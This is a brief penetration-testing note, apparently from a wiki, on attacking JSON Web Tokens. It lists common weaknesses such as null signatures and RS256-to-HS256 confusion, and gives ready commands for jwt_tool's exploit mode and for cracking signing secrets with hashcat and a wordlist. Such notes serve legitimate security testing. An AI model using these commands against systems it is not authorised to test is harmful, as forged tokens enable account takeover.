How to exploit JSON Web Tokens.
JWT Tool is great for finding issues in JSON Web Tokens. It will help to identify the following issues:
JWT uses HS256 signing algorithm
JWT contains sensitive data
JWT does not expire
JWT permits a NULL signature
RS256 to HS256
python jwt_tool.py <JWT> -X a
https://github.com/ticarpi/jwt_tool/arrow-up-right
Use the following command to crack JWTs.
hashcat.exe -m 16500 /JWT.txt rockyou.txt --backend-ignore-cuda
JWT.txt should contain your JWT.
Various password wordlists can be used. rockyou.txt is one example.
https://hashcat.net/hashcat/arrow-up-right
Last updated 1 year ago
